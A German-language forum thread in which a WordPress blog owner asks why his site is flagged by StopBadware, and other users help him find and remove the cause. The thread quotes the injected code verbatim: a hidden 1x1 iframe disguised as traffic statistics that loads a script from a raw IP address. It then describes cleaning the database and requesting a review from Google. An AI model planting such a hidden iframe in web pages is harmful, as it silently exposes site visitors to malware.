Seite grundlos bei StopBadware

[newcomer]

Hallo,

Ich war völlig baff, als ich auf einmal die Warnung bekam, dass
man sich auf meiner Seite was einfangen kann..
ICh kann mir nicht erklären woran das liegen könnte.
Ist nur ein Weblog, Antispam ist aktiviert.
Könnte da vielleicht mal jemand rüberschauen?

www.promi-pannen.de

mFG

und danke für die Hilfe

[Pompom]

Guck mal auf deine Seite, schau dir den Quelltext an nach diesem Code:

<!-- Traffic Statistics --> <iframe src=https://61.155.8.157/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> <!-- End Traffic Statistics -->

das ist er, der böse Übeltöter.

[newcomer]

Warum hab ich das nicht selber entdeckt?
Dank dir!
Was is das für ein Schmarrn?

Oh man ich hab grad n ganz dummes Gefühl in der Magengegend.
Ich habe, weil ich auf Arbeit keinen FTP Zugang habe über webftp.de auf
meinen Webspace zugegriffen. Ob da vielleicht der Überltäter herkommt?

[seo-link]

Jo ... bei mir schlagt Norton auch an.


Überprüfe mal dein Emailpostfach und vorallem jag mal Spyware-Doctor über deinen PC. Den bekommst Du kostenlos im Google-Pack.

Bin mir ziemlich sicher, dass etwas gefunden wird

[newcomer]

F...
ist das auch der IFrame oder was?

[Pompom]

Ich habe, weil ich auf Arbeit keinen FTP Zugang habe über webftp.de auf
meinen Webspace zugegriffen. Ob da vielleicht der Überltäter herkommt?

Das wäre schon ganz schön dreist, kann ich mir eigentlich nicht vorstellen.
Ich habe mir deine Seite nicht angeguckt, aber wahrscheinlicher ist es, dass du unsichere Software einsetzt.

[newcomer]

Da läuft nur Wordpress drauf.
Naja dann werde ich da mal ordentlich aufräumen und denn
denn Antrag überdie Webmastertools einreichen.
Hoffe das dauert nicht solange


Ich fass es nicht, dass Teil hat sich in einem Beitrag eingeschlichen.
K.A. wie. HAbs jetzt gelöscht

Hoffe, dass nicht noch mehr davon irgendwo im Code rumschwirrt
Hab n Dump der DB gemacht und alle Stellen wo sich irgendwo n IFrame eingeschlichen hat ausfindig gemacht und bereinigt.
Wenn mal jemand so nett wär zu überprüfen obs immer noch ne AntiVirus Warnung gibt. Danke

[Pompom]

Ach, Wordpress...

Da gibt es viel zu lesen.

https://www.google.de/search?num=100&hl ... ress&meta=

[newcomer]

Hab auch grad schon ne Menge drüber gelesen.
Joomla User haben das gleiche Problem.
Gut na mal hoffen das Google schnell reagiert, sonst ist mein TRaffic
weg. Werd dann mal schnell n Update rüberlaufen lassen

[seo-link]

Jo ... hatte damals das selbe Problem!
Muß aber nicht unbedingt an Wordpress liegen.

Ich habe nach dem Check mit Spywaredoc ein Haufen Zeug gefunden.
Seit ich meinen PC neu aufgesetzt habe und Norton Internet Security verwende, habe ich keine Probleme mehr. Egal ob Joomla, Wordpress oder ähnliche befallenen Scripte, Norton bemerkt diese DL´s. (siehe Bild)

Rein theoretisch hat jetzt jeder Besucher von Dir dieses Problem!!!
Wenn der DL nicht blockiert / erkannt wurde, sind die PC´s jetzt infiziert und sollten sofort gecheckt werden.

Ok ... Sicherheitslücken gibt es anscheind in jedem Script. Meistens sind die index.php (index.html) oder footer.php (footer.tpl) verseucht.

[newcomer]

So also ich muss sagen es ging Gott sei Dank fix mit Google.
Innerhalb von 24 Stunden ist die Warnung nun wieder verschwunden.

[Nutzer0815]

0815

[newcomer]

Ich habe direkt an StopBAdware geschrieben und über WebmasterTools von Google.

[seo-link]

Geht eigentlich schnell ... man sollte, wie Du auch, sofort reagieren und Email senden.

[newcomer]

Jup... Jetzt hab ich mir noch rasch ne Seite gebastelt, wo ich alle meine Projekte im Überblick habe und wo solche Sachen überprüft werden. Die lasse ich mit nem Cronjob einmal am Tag aufrufen und wenn was Verdächtiges sein Unwesen treibt erhalte ich gleich ne Email.
Denke damit sollte ich das Problem in Zukunft im Griff haben